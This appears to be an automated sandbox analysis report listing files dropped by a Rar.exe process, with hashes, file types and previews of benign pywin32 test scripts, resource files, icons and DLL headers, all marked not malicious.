                                                                                                                                                                                      Preview:import threading.import time.import unittest..import pywintypes.import win32con.import win32event.import win32file.import win32pipe.import winerror.from pywin32_testutil import str2bytes # py3k-friendly helper...class PipeTests(unittest.TestCase):. pipename = "\\\\.\\pipe\\python_test_pipe".. def _serverThread(self, pipe_handle, event, wait_time):. # just do one connection and terminate.. hr = win32pipe.ConnectNamedPipe(pipe_handle). self.assertTrue(. hr in (0, winerror.ERROR_PIPE_CONNECTED), "Got error code 0x%x" % (hr,). ). hr, got = win32file.ReadFile(pipe_handle, 100). self.assertEqual(got, str2bytes("foo\0bar")). time.sleep(wait_time). win32file.WriteFile(pipe_handle, str2bytes("bar\0foo")). pipe_handle.Close(). event.set().. def startPipeServer(self, event, wait_time=0):. openMode = win32pipe.PIPE_ACCESS_DUPLEX. pipeMode = win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):681
                                                                                                                                                                                      Entropy (8bit):4.600120055398157
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:Lq42LdWU6QPJv/MPoYiSIkYdVhQMeZewofMm5bVHYRF2pV7u:WWUC1iSIkYzhcZe9m0pVS
                                                                                                                                                                                      MD5:CA7875992F54668EE4C26B3E048F45D2
                                                                                                                                                                                      SHA1:55A9F5610A0DCE2B4A618E450B1ACC532E10AC11
                                                                                                                                                                                      SHA-256:1B1D69A6E32BCA5FAC96182ACB8DFD35AE8F48B452F2DD61BE67414AB79A42C4
                                                                                                                                                                                      SHA-512:CE6AC1C67301052E0104C574BC510A62A8A63DF982C387B78EB04BA35628E39FFF1DA630B6FE550FEF7F95DBF233914909FE83BA9C9C1C3B25A540708C986EE4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Tests (scarce) for win32print module..import unittest..import win32print as wprn...class Win32PrintTestCase(unittest.TestCase):. def setUp(self):. self.printer_idx = 0. self.printer_levels_all = list(range(1, 10)). self.local_printers = wprn.EnumPrinters(wprn.PRINTER_ENUM_LOCAL, None, 1).. def test_printer_levels_read_dummy(self):. if not self.local_printers:. print("Test didn't run (no local printers)!"). return. ph = wprn.OpenPrinter(self.local_printers[self.printer_idx][2]). for level in self.printer_levels_all:. wprn.GetPrinter(ph, level)...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):389
                                                                                                                                                                                      Entropy (8bit):4.535765323916297
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:NyRFLXvLSYpwtstqrzQpFVb2WkEYoKXFfMLkppb2rkUAjpAC7Mv:NKFLXvO4TbTYtXJba2pV7u
                                                                                                                                                                                      MD5:F78744E1A96E4C1F0F8A9B06C76BBD5F
                                                                                                                                                                                      SHA1:67A8E82CADDB11F2E0CF590BEEC3BE0CFA5A3575
                                                                                                                                                                                      SHA-256:D67BBF211BAFC8305BFC7E223DC56A88464E1BE5B65DB427745BBF8BC181D241
                                                                                                                                                                                      SHA-512:01BA7F2D063E1C7F7FA480969BF7B16F67A851C09310A75A69ED7D5FD2B740D3143D2B766023515FCECC40C8203DA3EA2022D91BCEC9957527A3AD09D1410EF2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Test win32profile""".import os.import unittest..import win32profile...class Tester(unittest.TestCase):. def test_environment(self):. os.environ["FOO"] = "bar=baz". env = win32profile.GetEnvironmentStrings(). assert "FOO" in env. assert env["FOO"] == "bar=baz". assert os.environ["FOO"] == "bar=baz"...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2462
                                                                                                                                                                                      Entropy (8bit):4.693224762679464
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:VYqchbQKoP586t8qj4sYRqZrqvOlH7gfS:VYqchYzt8gAqsOlH7gq
                                                                                                                                                                                      MD5:FE721D7BDD29E9998EEB3208CDB4A95D
                                                                                                                                                                                      SHA1:8DF8FD70E75CE58F5BCD5F89967DEECE0D5A8C93
                                                                                                                                                                                      SHA-256:F677D0C135FF762FE60F9C1C52332ED6C04A776CB20E5C3C4FF0B0F05523D008
                                                                                                                                                                                      SHA-512:6C1E3395039EAF8F6F2F4A2663352EBB8CAC534F8495DAA9B11CA158F1F2F2E6316BBB8362D177E6387AE7A320C914F7F33A1A9DCFD6307C0C0FADE2C7E7B8AB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os.import tempfile.import unittest..import win32con.import win32rcparser...class TestParser(unittest.TestCase):. def setUp(self):. rc_file = os.path.join(os.path.dirname(__file__), "win32rcparser", "test.rc"). self.resources = win32rcparser.Parse(rc_file).. def testStrings(self):. for sid, expected in (. ("IDS_TEST_STRING4", "Test 'single quoted' string"),. ("IDS_TEST_STRING1", 'Test "quoted" string'),. ("IDS_TEST_STRING3", 'String with single " quote'),. ("IDS_TEST_STRING2", "Test string"),. ):. got = self.resources.stringTable[sid].value. self.assertEqual(got, expected).. def testStandardIds(self):. for idc in "IDOK IDCANCEL".split():. correct = getattr(win32con, idc). self.assertEqual(self.resources.names[correct], idc). self.assertEqual(self.resources.ids[idc], correct).. def testTabStop(self):. d = self.resources.dialogs["I
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):774
                                                                                                                                                                                      Entropy (8bit):4.544684110688971
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:l8TebQz+CK8iFa3vNnYtRz+tjyHkTn5pVS:l8qbQz+C1iFa/Nnsz+tj3FfS
                                                                                                                                                                                      MD5:EB93616B87101E3636F95B9C99B8DB33
                                                                                                                                                                                      SHA1:E1D393944DFB58A518DA53BC3F379E4116A396C4
                                                                                                                                                                                      SHA-256:2C13496CCD350A1A6059ED8BACE5D943DE9C70201D1257FEE0687BAFE524F9A7
                                                                                                                                                                                      SHA-512:76ED693E65AAC9BC4F6AE27C476F31EAEF498A3EBEC9FB5DAF1CA41B770D95B3A15BD88438CF2DCB02680C271E26EF77A805787BEBBC77331D269ECFA31D4287
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Test module for win32timezone..import doctest.import sys.import unittest..import win32timezone...class Win32TimeZoneTest(unittest.TestCase):. def testWin32TZ(self):. # On 3.7 and later, the repr() for datetime objects changed to use kwargs - eg,. # eg, `datetime.timedelta(0, 10800)` is now `datetime.timedelta(seconds=10800)`.. # So we just skip the tests on 3.5 and 3.6. if sys.version_info < (3, 7):. from pywin32_testutil import TestSkipped.. raise TestSkipped(. "The repr() for datetime objects makes this test fail in 3.5 and 3.6". ).. failed, total = doctest.testmod(win32timezone, verbose=False). self.assertFalse(failed)...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11415
                                                                                                                                                                                      Entropy (8bit):4.51306928669101
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ZZjEDkF9M6VZwHSvCUsXsEboxhWm7mUksYgms47sQ8C9ZRB3UZbU83ViNuDRJZBg:ZWASEQSc6xcm7mUkx3ZXWU8oCNcCs
                                                                                                                                                                                      MD5:D31B968890F11B8E808CB0A707353CB2
                                                                                                                                                                                      SHA1:1C77EFD68D15B9E0D5D3031FE9C2BAD4087EDFEE
                                                                                                                                                                                      SHA-256:CDDD29A1351F771EB9048BC4CFEBE24D7DAFDF9B80BE451E8B5B39D5602ED835
                                                                                                                                                                                      SHA-512:52E99B1AEA9BB427DA3D64DA50BCF6FADCCAE5A1735066A65E1BA750A369E52AEFCFB75108FE4936DB02762B8F6A2AB5850C8362317620FC3363E94E8B0BA7E5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os.import sys.import threading.import time.import unittest..import win32trace.from pywin32_testutil import TestSkipped..if __name__ == "__main__":. this_file = sys.argv[0].else:. this_file = __file__...def SkipIfCI():. # This test often fails in CI, probably when it is being run multiple times. # (ie, for different Python versions). # Github actions always have a `CI` variable.. if "CI" in os.environ:. raise TestSkipped("We skip this test on CI")...def CheckNoOtherReaders():. win32trace.write("Hi"). time.sleep(0.05). if win32trace.read() != "Hi":. # Reset everything so following tests still fail with this error!. win32trace.TermRead(). win32trace.TermWrite(). raise RuntimeError(. "An existing win32trace reader appears to be ". "running - please stop this process and try again". )...class TestInitOps(unittest.TestCase):. def setUp(self):. SkipIfCI(). # clear old data.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5810
                                                                                                                                                                                      Entropy (8bit):4.711734132606811
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:LCkYbvWtakMDqPaR7v/RqtdfllFpK6tVlHCXEZyqLQ4wmILiW6gG06MTKNOq:9akMDqP27xqtdv9AUZHLQ479DMTNq
                                                                                                                                                                                      MD5:5EA7551E921DA9DDEF12BEE243E4494B
                                                                                                                                                                                      SHA1:F63F0CB65B4F881EAFFBE06A4C396A395F21E433
                                                                                                                                                                                      SHA-256:A5D600D8C295CC07823DB4FBB1AAA9ADACF7627F59EF71E1EE9285BAA9E76CFC
                                                                                                                                                                                      SHA-512:72675633C3E2BA2E48886912CF5FE719040E2D5341F570DF627F503FD0CA9497D0C3B8DBCB842EB43242F97A41AB9EF46E527034917666AAB301CB4B0219CD9C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import unittest..import netbios.import win32api.import win32wnet.from pywin32_testutil import str2bytes..RESOURCE_CONNECTED = 0x00000001.RESOURCE_GLOBALNET = 0x00000002.RESOURCE_REMEMBERED = 0x00000003.RESOURCE_RECENT = 0x00000004.RESOURCE_CONTEXT = 0x00000005.RESOURCETYPE_ANY = 0x00000000.RESOURCETYPE_DISK = 0x00000001.RESOURCETYPE_PRINT = 0x00000002.RESOURCETYPE_RESERVED = 0x00000008.RESOURCETYPE_UNKNOWN = 0xFFFFFFFF.RESOURCEUSAGE_CONNECTABLE = 0x00000001.RESOURCEUSAGE_CONTAINER = 0x00000002.RESOURCEDISPLAYTYPE_GENERIC = 0x00000000.RESOURCEDISPLAYTYPE_DOMAIN = 0x00000001.RESOURCEDISPLAYTYPE_SERVER = 0x00000002.RESOURCEDISPLAYTYPE_SHARE = 0x00000003...NETRESOURCE_attributes = [. ("dwScope", int),. ("dwType", int),. ("dwDisplayType", int),. ("dwUsage", int),. ("lpLocalName", str),. ("lpRemoteName", str),. ("lpComment", str),. ("lpProvider", str),.]..NCB_attributes = [. ("Command", int),. ("Retcode", int),. ("Lsn", int),. ("Num", int),. # ("Buff
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7254
                                                                                                                                                                                      Entropy (8bit):4.324657504637411
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:dL2D8uzIaoa80XFiHTPusLCsRg9LOwS2wsff2yIdEJBwys3u7HQ9jUNw8kKzTxsz:dGIRBeeT2OuEgfiGRoFQ9sC6
                                                                                                                                                                                      MD5:7F09D3E18F73FEBB6A4CC0EF60200C1D
                                                                                                                                                                                      SHA1:89B5B096A4FA43486597D5221DEA90E4B4C5F519
                                                                                                                                                                                      SHA-256:DDFACE034C91EF063814F00BE94B76B846E9977088B7DA7FB7EC62A2CBE1EA7C
                                                                                                                                                                                      SHA-512:ECAF5E1BBB6A4D9785778F5CF31AE91DFA80FE937636F16889D1B8CC87BE82D8FE48868FE0E410B5B8CD35772BB6B9E1F66474A122FC302E562D4B09C9C45B18
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os.import re.import sys.import traceback.import unittest..import pywin32_testutil..# A list of demos that depend on user-interface of *any* kind. Tests listed.# here are not suitable for unattended testing..ui_demos = """GetSaveFileName print_desktop win32cred_demo win32gui_demo. win32gui_dialog win32gui_menu win32gui_taskbar. win32rcparser_demo winprocess win32console_demo. win32clipboard_bitmapdemo. win32gui_devicenotify. NetValidatePasswordPolicy""".split().# Other demos known as 'bad' (or at least highly unlikely to work).# cerapi: no CE module is built (CE via pywin32 appears dead).# desktopmanager: hangs (well, hangs for 60secs or so...).# EvtSubscribe_*: must be run together:.# SystemParametersInfo: a couple of the params cause markh to hang, and there's.# no great reason to adjust (twice!) all those system settings!.bad_demos = """cerapi desktopmanager win32comport_demo. EvtSubscribe_pull Evt
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PC bitmap, Windows 3.x format, 33 x 33 x 4, image size 660, cbSize 778, bits offset 118
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):778
                                                                                                                                                                                      Entropy (8bit):3.1275984527229412
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:4giJF9YnuKLG1jRsOuhsuyR5ejFKzRvqasurl99OOyHrLn:4bK61VMxFalw
                                                                                                                                                                                      MD5:527ACF2CA463153A889C0D30366EFAC1
                                                                                                                                                                                      SHA1:9A2FF9C2B217CB1A8541B6B44AB92080E4EA0935
                                                                                                                                                                                      SHA-256:19623132815DADA9EA5C7C4883227F768BC904D7C2C5CFCE4259D21B14DF1CB1
                                                                                                                                                                                      SHA-512:FA6D0B602628F5752BF5A9B58E0BA234B904DC571970FB426EEBE40072B9581A5BCAC3878B50C5DDA171B7637F87429CD94A6F7209ECBE029426781D46E2458E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:BM........v...(...!...!.............................................................................................................................................................3...................33.333...........33333330..........3:3333333333........330333.3330.........333.30.30.0........3.330......0..........333................3.330................33.................:330............:.....33.............:...:33..............:..30............:.3.30..............:...30...............:.330.........333.....330..........033....33..........33333...33..........333333:.30...........33333030..............0.30..............................................................................................3.................030.................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):766
                                                                                                                                                                                      Entropy (8bit):2.9744570511075614
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:IEipKm6kpU3/tRz//lFWIzldyMQSCrDs+/Co08daaeP:IEiQm6kkRDtFrdyMJCrDs+/CAIP
                                                                                                                                                                                      MD5:FC2A98F8A8428A9A6D5579C79A94FBD8
                                                                                                                                                                                      SHA1:5A43595D92FF2E5AB3EFA2DF1A0643A27C09CD1F
                                                                                                                                                                                      SHA-256:2E7402ED1683A751BB5222A0379E5D8A50E3467E35C0D0D35B2A3CCA645372DC
                                                                                                                                                                                      SHA-512:FE9ECD2B045670D16AB305E5F6EE943D99B4DA320BE5D23CF5BE9A0FD35ED17A58C7479B23D27FBFA64A8DDE3DF2911FD1738CE46C772E6F55D4072C8CFCCC88
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...... ..............(... ...@...................................................................................................................................3.................33.333.........33333330......3:3333333333......330333.3330.....333.30.30.0....3.330......0......333............3.330..............33.............:330........:.....33.........:...:33..........:....30..........:.3.30..........:...30...........:.330.....333.....330......033....33......33333...33......333333:.30.......33333030..........0.30..............................................................................3.............030........................................g........................_........0...........................................................................G..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:C source, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1169
                                                                                                                                                                                      Entropy (8bit):5.066451700026354
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:mfAR2Xzlz9lh8IkXz/f7Yg3Fl9Kynarx48pfLtcmc2IcfDcb/:4HdV8I6T3/0ynadZM/
                                                                                                                                                                                      MD5:60B583798EAE6B6F72A6278FAFF13250
                                                                                                                                                                                      SHA1:F08720EDD570520DBF88BD241182D59994314045
                                                                                                                                                                                      SHA-256:CE7A510695120F2EBB6BBEAC0C7B8FD2E4C0258BF4F637E392BD5E85FFF08BC2
                                                                                                                                                                                      SHA-512:30F982EF35CAED22DF7DE381D3FD7B6EE50F0144337EA9AE2572928155C6EC4B98A840D99C8653F1E8EFE60BE14645CA35B9E7FDFA9CBA044589117ACA70F3DA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview://{{NO_DEPENDENCIES}}.// Microsoft Developer Studio generated include file..// Used by test.rc.//.#define IDS_TEST_STRING1 51.#define IDS_TEST_STRING2 52.#define IDS_TEST_STRING3 53.#define IDS_TEST_STRING4 54.#define IDS_TEST_STRING5 55.#define IDS_TEST_STRING6 56.#define IDS_TEST_STRING7 57.#define IDD_TEST_DIALOG1 101.#define IDD_TEST_DIALOG2 102.#define IDB_PYTHON 103.#define IDI_PYTHON 105.#define IDD_TEST_DIALOG3 105.#define IDC_EDIT1 1000.#define IDC_CHECK1 1001.#define IDC_EDIT2 1001.#define IDC_COMBO1 1002.#define IDC_SPIN1 1003.#define IDC_PROGRESS1 1004.#define IDC_SLIDER1 1005.#define IDC_LIST1 1006.#define IDC_TREE1 1007.#define IDC_TAB1 1008.#define IDC_ANIMATE1 1009.#define IDC_RICHEDIT1 1010.#define IDC_DATETIMEPICKER1 1011.#define IDC_MONTHCALENDAR1 1012.#define IDC_SCROLLBAR1 1013.#define IDC_SCROLLBAR2 1014.#define IDC_LIST2 1015.#define IDC_HELLO 1016.#define IDC_HELLO2 1017..// Next default values for new objects.//.#ifdef APSTUDIO_INVOKED.#ifndef APSTUDIO_READONLY
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:C source, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6273
                                                                                                                                                                                      Entropy (8bit):4.814338859710688
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:9IvbeVpdPK9POPlrjywqjiHwy/JrjxIF0mqnWldrheQ9nn5e:MbeVpdi9mPlSwqaJrjxi0mqnWPhX5e
                                                                                                                                                                                      MD5:2C3DD64292595BF0C580F3EA135EEC18
                                                                                                                                                                                      SHA1:29526198EEA82C60D9C40D3CD389C2BBBEF16FA0
                                                                                                                                                                                      SHA-256:8BA44D67D9F96EE91975990BAA518DB303E6EE90AFABBED6953F4B21268CE01B
                                                                                                                                                                                      SHA-512:A952FFF91B2DFECAA51EAFC7D08F47404E0C80D5F12896644E1E83BCE0B84C02BD6A2BCBF3F83D3EBC413484BCF82A5CADEFA90AAD938421CA85CBA9ED356BBE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview://Microsoft Developer Studio generated resource script..//.#include "test.h"..#define APSTUDIO_READONLY_SYMBOLS./////////////////////////////////////////////////////////////////////////////.//.// Generated from the TEXTINCLUDE 2 resource..//.#include "afxres.h"../////////////////////////////////////////////////////////////////////////////.#undef APSTUDIO_READONLY_SYMBOLS../////////////////////////////////////////////////////////////////////////////.// English (Australia) resources..#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENA).#ifdef _WIN32.LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_AUS.#pragma code_page(1252).#endif //_WIN32..#ifdef APSTUDIO_INVOKED./////////////////////////////////////////////////////////////////////////////.//.// TEXTINCLUDE.//..1 TEXTINCLUDE DISCARDABLE .BEGIN. "test.h\0".END..2 TEXTINCLUDE DISCARDABLE .BEGIN. "#include ""afxres.h""\r\n". "\0".END..3 TEXTINCLUDE DISCARDABLE .BEGIN. "\r\n". "\0".END..#endif // APSTUDIO_INVOKED.../////////////
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                      Entropy (8bit):5.716617252323436
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:JhsSwN9L2hrRBJSwrzQVkzwBal2kcDjbwJjOtiGDqtoimF/lJkdumITzaJvGlkwv:JB2pCakzRlB+jbYj6iGDq1mFIdnjOlk
                                                                                                                                                                                      MD5:B5A90C757460AAF2280B9DB020274F15
                                                                                                                                                                                      SHA1:35D6999E10C8EE6ECD88940AE39BD89C6FD3C97E
                                                                                                                                                                                      SHA-256:070FEC28E4150AFFDF69CBC3042FDDDBCC79E95AF33D613DB0D6E4BF3DEBEC90
                                                                                                                                                                                      SHA-512:DE4B16E440C10556BE4B3F696E81626E11B68374385B9E4CDDE4DE0CAE6F10F70D36585807CD1D7B862C3C6E1306B5DED40654879C1584E9430DBC057B26D5B8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............{...{...{......{...z...{...~...{.......{...x...{.,.z...{.J.z...{...z...{...z...{.,.r...{.,.{...{.,.y...{.Rich..{.........................PE..L......d...........!.........................0...............................p............@..........................7..L....7.......P..L....................`.......2..T............................3..@............0...............................text............................... ..`.rdata..~....0......................@..@.data........@.......,..............@....rsrc...L....P......................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):103424
                                                                                                                                                                                      Entropy (8bit):6.3909294717445375
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:xBzJ+cRa1YmNAC06yHiG0fVhVFhLqN6/2yymx+dCanfO8eFgqT2JE:xBzJ+cZYVhVl/2yAdCa2Lv2E
                                                                                                                                                                                      MD5:EE407DCEA96D260B9DF5AED85408FE8D
                                                                                                                                                                                      SHA1:600A8CCC28069ABF6920536EE9D2DBBAB449EF5B
                                                                                                                                                                                      SHA-256:91FA48528506D909C2E40103813789738915FF1318EF20118DC19D17AD017955
                                                                                                                                                                                      SHA-512:45EACC91681556AC0DB64B071B600AF84F9CFDB65771529601095B6C1B69EF4B06632298F4B464EA1DF5AFD1DAD91E94977C28C9A752283D6C9A1F224EB3B9E3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................`.....................l.........................l......l....l....Rich...........................PE..L......d...........!......................................................................@..........................C......TD..........\........................ ...:..T...............................@...............p...\C..@....................text...{........................... ..`.rdata..`k.......l..................@..@.data........p.......\..............@....rsrc...\............n..............@..@.reloc... ......."...r..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21504
                                                                                                                                                                                      Entropy (8bit):6.058338660371219
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:V7rLbe3Gp2GoXgR551OVpHV4rjjiqURJ0nl5Bzp1dn/g+yE+vpLF7:Vfb3D751OVpHV4uRmR9/g+ytpLh
                                                                                                                                                                                      MD5:026FD8B8A64FAEF005332FDB04768C75
                                                                                                                                                                                      SHA1:EE484A9A76D5F9AF7F2C9D0E298C5AFA58FB1C0C
                                                                                                                                                                                      SHA-256:1D62BF814660CD5E45C9E0A3FB87C99CABCA20BA75C36C4E8B5A8C65FDA4565E
                                                                                                                                                                                      SHA-512:485B16D1BFB2B026BBBCE1EABA53EDD8EC4AC282E9E3A1B4AB13F1A2CBCF2CB2A342BCD7A300B9BF1414CFEBE22772CBA5BD676C7E82A3BFAA5EA6DDD1C16634
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c...............................................x.......................................Rich...................PE..L......d...........!.....(...(......R'.......@............................................@.........................0N..\....N.......p..t............................I..T...........................XI..@............@...............................text...3'.......(.................. ..`.rdata.......@.......,..............@..@.data........`.......H..............@....rsrc...t....p.......J..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):48128
                                                                                                                                                                                      Entropy (8bit):6.224682276228643
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:DaSJeGiTydNIBDnAy9tSm8zzlihbDu2k9G79nmVoUG1q0gN/Dsm:DaSouIDAy3+zlAwVoUG1q0gN/Dh
                                                                                                                                                                                      MD5:96C2E89F35B72A39A7FF9EB1F12B0C28
                                                                                                                                                                                      SHA1:8B325403956BFC0B06A17D805B86E3E6196D9276
                                                                                                                                                                                      SHA-256:9667B61CFC8155843CE13B12BD308EB7D271F2840441EBB1712FC11A9C88005A
                                                                                                                                                                                      SHA-512:E5A3644D2D1B65FE396D2EDA70CBE86539D5099EC1C708D5F293708236A66E939290D72C7C1AF5D152846D932FE5ABEE3D7F935B3D00F62A02F86EEB64EA0728
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(.P(.P(.P!.3P..Pz..Q*.Pz..Q8.Pz..Q".Pz..Q).P.Q*.P...Q*.P<..Q+.P(.P..P.Q).P.Q).P.Q).PRich(.P................PE..L......d...........!.....V...b.......Q.......p............................................@.........................`...X...............l...........................|...T..............................@............p..,............................text...qT.......V.................. ..`.rdata...B...p...D...Z..............@..@.data...............................@....rsrc...l...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30208
                                                                                                                                                                                      Entropy (8bit):6.12826822648431
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:4t/yZ7KPObCP6EC5ZN4qel/yp2eR1WDk3MuCVK:W6ZGPOc6EmNreBeR1WDk3MuCVK
                                                                                                                                                                                      MD5:75D072824426AC103DBED6C7F794AC84
                                                                                                                                                                                      SHA1:1217F4826C2379A6FA25D738AE24087BE94DFD16
                                                                                                                                                                                      SHA-256:4F25FDD82B2E0631CA08C03911FB07DF35B044BABA38A7A1790B1E9FE0DAC20C
                                                                                                                                                                                      SHA-512:F9679201390C4B4840BF1268FB39C5723DE15A433CE2267FDC0E0CE40BC4A2114F032B7127C7F272148183A428FE62A4DF609CB3DCD79AF4659DD1299F891A26
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
